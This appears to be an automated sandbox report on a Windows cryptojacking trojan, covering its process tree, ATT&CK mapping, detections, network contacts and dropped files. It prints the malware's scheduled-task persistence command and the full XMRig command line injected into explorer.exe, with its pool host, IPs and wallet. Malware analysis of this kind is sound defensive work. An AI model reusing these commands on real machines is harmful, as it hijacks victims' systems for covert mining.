              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe' Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
              Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1Windows Service1Windows Service1Masquerading1OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsCommand and Scripting Interpreter1Scheduled Task/Job1Process Injection712Virtualization/Sandbox Evasion111LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Process Injection712Security Account ManagerVirtualization/Sandbox Evasion111SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 513056 Sample: pcNCraWcRk Startdate: 01/11/2021 Architecture: WINDOWS Score: 100 58 xmr.givemexyz.in 2->58 64 Sigma detected: Xmrig 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 6 other signatures 2->70 11 pcNCraWcRk.exe 2->11         started        14 services64.exe 2->14         started        signatures3 process4 signatures5 90 Writes to foreign memory regions 11->90 92 Allocates memory in foreign processes 11->92 94 Creates a thread in another existing process (thread injection) 11->94 16 conhost.exe 5 11->16         started        96 Antivirus detection for dropped file 14->96 98 Multi AV Scanner detection for dropped file 14->98 19 conhost.exe 6 14->19         started        process6 file7 50 C:\Users\user\AppData\...\services64.exe, PE32+ 16->50 dropped 52 C:\Users\...\services64.exe:Zone.Identifier, ASCII 16->52 dropped 22 cmd.exe 1 16->22         started        24 cmd.exe 1 16->24         started        54 C:\Users\user\AppData\...\sihost64.exe, PE32+ 19->54 dropped 72 Injects code into the Windows Explorer (explorer.exe) 19->72 74 Writes to foreign memory regions 19->74 76 Modifies the context of a thread in another process (thread injection) 19->76 78 2 other signatures 19->78 27 sihost64.exe 19->27         started        29 explorer.exe 19->29         started        signatures8 process9 signatures10 31 services64.exe 22->31         started        34 conhost.exe 22->34         started        80 Uses schtasks.exe or at.exe to add and modify task schedules 24->80 36 conhost.exe 24->36         started        38 schtasks.exe 1 24->38         started        82 Antivirus detection for dropped file 27->82 84 Multi AV Scanner detection for dropped file 27->84 86 Writes to foreign memory regions 27->86 88 2 other signatures 27->88 40 conhost.exe 2 27->40         started        process11 signatures12 108 Writes to foreign memory regions 31->108 110 Allocates memory in foreign processes 31->110 112 Creates a thread in another existing process (thread injection) 31->112 42 conhost.exe 2 31->42         started        process13 file14 56 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 42->56 dropped 100 Injects code into the Windows Explorer (explorer.exe) 42->100 102 Writes to foreign memory regions 42->102 104 Modifies the context of a thread in another process (thread injection) 42->104 106 Injects a PE file into a foreign processes 42->106 46 explorer.exe 42->46         started        signatures15 process16 dnsIp17 60 198.23.214.117, 49763, 8080 AS-COLOCROSSINGUS United States 46->60 62 xmr.givemexyz.in 46->62 114 System process connects to network (likely due to code injection or exploit) 46->114 116 Query firmware table information (likely to detect VMs) 46->116 signatures18 118 Detected Stratum mining protocol 60->118

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              pcNCraWcRk.exe65%VirustotalBrowse
              pcNCraWcRk.exe31%MetadefenderBrowse
              pcNCraWcRk.exe81%ReversingLabsWin64.Trojan.Donut
              pcNCraWcRk.exe100%AviraTR/Agent.wbqui

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe100%AviraTR/Agent.ywcqa
              C:\Users\user\AppData\Local\Temp\services64.exe100%AviraTR/Agent.wbqui
              C:\Users\user\AppData\Local\Temp\services64.exe65%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\services64.exe31%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\services64.exe81%ReversingLabsWin64.Trojan.Donut
              C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys1%VirustotalBrowse
              C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys3%MetadefenderBrowse
              C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys4%ReversingLabs
              C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe49%MetadefenderBrowse
              C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe82%ReversingLabsWin64.Trojan.Donut

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              17.0.explorer.exe.140000000.12.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.6.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.2.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.11.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.8.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.1.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.4.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.7.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.12.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.13.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.8.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.7.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.5.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.9.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.10.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.6.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.1.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.13.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.10.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.3.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.9.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.11.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.2.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.5.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.4.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.3.unpack100%AviraHEUR/AGEN.1134782Download File

              Domains

              SourceDetectionScannerLabelLink
              xmr.givemexyz.in16%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://xmrig.com/benchmark/%s0%URL Reputationsafe
              https://xmrig.com/wizard0%URL Reputationsafe
              https://xmrig.com/wizard%s0%URL Reputationsafe
              https://xmrig.com/docs/algorithms0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              xmr.givemexyz.in
              		212.114.52.24
              		truetrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://xmrig.com/benchmark/%sconhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://xmrig.com/wizardconhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameconhost.exe, 00000001.00000002.685200138.0000025F60DC1000.00000004.00000001.sdmpfalse
                		high
                https://xmrig.com/wizard%sconhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://xmrig.com/docs/algorithmsconhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                198.23.214.117
                		unknownUnited States
                		36352AS-COLOCROSSINGUStrue

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:513056
                Start date:01.11.2021
                Start time:18:19:07
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 9m 29s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:pcNCraWcRk (renamed file extension from none to exe)
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:21
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.evad.mine.winEXE@26/6@2/1
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 63.1% (good quality ratio 52.4%)
                • Quality average: 41.6%
                • Quality standard deviation: 27.2%
                HCA Information:
                • Successful, ratio: 88%
                • Number of executed functions: 44
                • Number of non-executed functions: 8
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.209.183, 8.248.119.254, 8.238.85.254, 8.248.137.254, 8.241.126.249, 8.248.99.254, 173.222.108.147, 173.222.108.226
                • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, store-images.s-microsoft.com, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, arc.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net
                • Not all processes where analyzed, report is missing behavior information

                Simulations

                Behavior and APIs

                TimeTypeDescription
                18:20:03API Interceptor1x Sleep call for process: pcNCraWcRk.exe modified
                18:20:07API Interceptor4x Sleep call for process: conhost.exe modified
                18:20:09Task SchedulerRun new task: services64 path: C:\Users\user\AppData\Local\Temp\services64.exe
                18:20:10API Interceptor2x Sleep call for process: services64.exe modified
                18:20:13API Interceptor1x Sleep call for process: sihost64.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                xmr.givemexyz.inoracleservice.exeGet hashmaliciousBrowse
                • 212.114.52.24
                nazi.exeGet hashmaliciousBrowse
                • 194.5.249.24

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                AS-COLOCROSSINGUSAnnouncement.xlsxGet hashmaliciousBrowse
                • 198.46.132.212
                Swift Transfer - Failure.xlsxGet hashmaliciousBrowse
                • 192.227.158.116
                Inquiry files_00123.xlsxGet hashmaliciousBrowse
                • 198.23.213.2
                flv0110121.xlsxGet hashmaliciousBrowse
                • 198.23.213.2
                Document.exeGet hashmaliciousBrowse
                • 107.175.32.198
                Booking.xlsxGet hashmaliciousBrowse
                • 107.172.75.205
                SHIPPPING-DOC.xlsxGet hashmaliciousBrowse
                • 198.46.199.161
                xE9 Players Full Profiles.xlsxGet hashmaliciousBrowse
                • 198.46.199.161
                RFQ DTD011121- FAMORITALIA.xlsxGet hashmaliciousBrowse
                • 107.173.191.112
                NEW ORDER (001) P000000000000 D02.xlsxGet hashmaliciousBrowse
                • 192.227.158.118
                scan_documents.xlsxGet hashmaliciousBrowse
                • 107.172.75.205
                VuMhXFFSwX.exeGet hashmaliciousBrowse
                • 23.94.183.146
                4oPbyzyFDC.rtfGet hashmaliciousBrowse
                • 192.227.228.38
                new order sheet 0016.xlsxGet hashmaliciousBrowse
                • 198.23.212.136
                agreement.xlsxGet hashmaliciousBrowse
                • 198.46.199.161
                SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                • 198.46.199.161
                new oder sheet 0015.xlsxGet hashmaliciousBrowse
                • 198.23.212.136
                Statement of Account for OCTOBER 2021pdf.exeGet hashmaliciousBrowse
                • 23.95.115.74
                RPA Purchase Order.xlsxGet hashmaliciousBrowse
                • 107.172.13.131
                008.xlsxGet hashmaliciousBrowse
                • 198.23.212.136

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysFreeForYou.exeGet hashmaliciousBrowse
                  A3aCLmM4IV.exeGet hashmaliciousBrowse
                    Software patch by Silensix.exeGet hashmaliciousBrowse
                      96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f1.exeGet hashmaliciousBrowse
                        sWSfbao3sR.exeGet hashmaliciousBrowse
                          Fortnite Hack Mod v1.4.exeGet hashmaliciousBrowse
                            LauncherHack.exeGet hashmaliciousBrowse
                              Hack.exeGet hashmaliciousBrowse
                                ixijzt2mxt.exeGet hashmaliciousBrowse
                                  GTA5TerrorMM.exeGet hashmaliciousBrowse
                                    FANDER_MOD V3.03.exeGet hashmaliciousBrowse
                                      Injector.exeGet hashmaliciousBrowse
                                        Injector.exeGet hashmaliciousBrowse
                                          61BoDeKl0u.exeGet hashmaliciousBrowse
                                            ShinChangerFort.exeGet hashmaliciousBrowse
                                              Sapphire.exeGet hashmaliciousBrowse
                                                p5x6Tk5245.exeGet hashmaliciousBrowse
                                                  install.exeGet hashmaliciousBrowse
                                                    wpXW8288lr.exeGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Trojan.InjectNET.14.313.exeGet hashmaliciousBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):539
                                                        Entropy (8bit):5.348465763088588
                                                        Encrypted:false
                                                        SSDEEP:12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTaDAWDLI4MWuCv:ML9E4Kr8sXE4+aE4Ks
                                                        MD5:AD3DC4BDB13FFE4ABD214A6EB4E5A519
                                                        SHA1:A2C3FCBCA3F40AE579E303AA8E8E2810860F088C
                                                        SHA-256:EEA4FDD5FA39D6145F4C5ABFB3BEB63C1D750B2BBA95D5D9D52F245AA07DC02D
                                                        SHA-512:50E0046F80823EB299545C16DD4A027A6294CC74294AE12D9A40F62FB6F1E92319511E90486427F2FEE44E6BB3E1317EA582284FB6CD82CA1BE9B5F3614BBE12
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                        C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):2234368
                                                        Entropy (8bit):7.999681283638092
                                                        Encrypted:true
                                                        SSDEEP:24576:1drStRzAeuEl5IJw6mgjogJlV50mtIJfBaH1NUqGCnW1lm/SIwDIGPvarynWZqJ3:LGRUEIRPlVydBLCelDI1m0yBJSXM/nP
                                                        MD5:0958FA69BA0E6645C42215C5325D8F76
                                                        SHA1:800666827E118CE78AEF55C47864512EF9D3B7A6
                                                        SHA-256:1B0C9F3F22D25CD518E480798EE44E8876107B2D37B2E92997C039D4A6C69DB1
                                                        SHA-512:95F582F9B45325951FE4CDC40CD5AE1037A955E437C052C64186641785F8170C7C9CB9532756166E267F0398217991C616AD86115EBB8D0B183898887950CC28
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Virustotal, Detection: 65%, Browse
                                                        • Antivirus: Metadefender, Detection: 31%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P"......~".....................................................0)".<............@".....................................................................l)"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Local\Temp\services64.exe:Zone.Identifier
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                        C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):14544
                                                        Entropy (8bit):6.2660301556221185
                                                        Encrypted:false
                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Virustotal, Detection: 1%, Browse
                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Joe Sandbox View:
                                                        • Filename: FreeForYou.exe, Detection: malicious, Browse
                                                        • Filename: A3aCLmM4IV.exe, Detection: malicious, Browse
                                                        • Filename: Software patch by Silensix.exe, Detection: malicious, Browse
                                                        • Filename: 96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f1.exe, Detection: malicious, Browse
                                                        • Filename: sWSfbao3sR.exe, Detection: malicious, Browse
                                                        • Filename: Fortnite Hack Mod v1.4.exe, Detection: malicious, Browse
                                                        • Filename: LauncherHack.exe, Detection: malicious, Browse
                                                        • Filename: Hack.exe, Detection: malicious, Browse
                                                        • Filename: ixijzt2mxt.exe, Detection: malicious, Browse
                                                        • Filename: GTA5TerrorMM.exe, Detection: malicious, Browse
                                                        • Filename: FANDER_MOD V3.03.exe, Detection: malicious, Browse
                                                        • Filename: Injector.exe, Detection: malicious, Browse
                                                        • Filename: Injector.exe, Detection: malicious, Browse
                                                        • Filename: 61BoDeKl0u.exe, Detection: malicious, Browse
                                                        • Filename: ShinChangerFort.exe, Detection: malicious, Browse
                                                        • Filename: Sapphire.exe, Detection: malicious, Browse
                                                        • Filename: p5x6Tk5245.exe, Detection: malicious, Browse
                                                        • Filename: install.exe, Detection: malicious, Browse
                                                        • Filename: wpXW8288lr.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.Trojan.InjectNET.14.313.exe, Detection: malicious, Browse
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):31232
                                                        Entropy (8bit):7.562503947370134
                                                        Encrypted:false
                                                        SSDEEP:384:VBTkmAadBYV6qxjqoz9EFEJNsoZuKVAWIL47zbMluB8qywZfH2pUq:kqjhWN6Fayodnm47zbMluB8U2pU
                                                        MD5:2497F634A80476AE2EAE956D8B84528E
                                                        SHA1:37DC97DFDA569615F036C7B3F74732231C9772E7
                                                        SHA-256:91EFE614A81B0E8F15EF7814CEB90DA038E6FDA29AAB733E53D8E3B49706B9BE
                                                        SHA-512:228F42E993F4089223ECDA317DCED1C8274CBAE75667478F43D31F9CF39DF35F62BE19624E24C39E2D4980C3174E6ED4BB2214F0383491AF862BF4681FBDAD35
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Metadefender, Detection: 49%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 82%
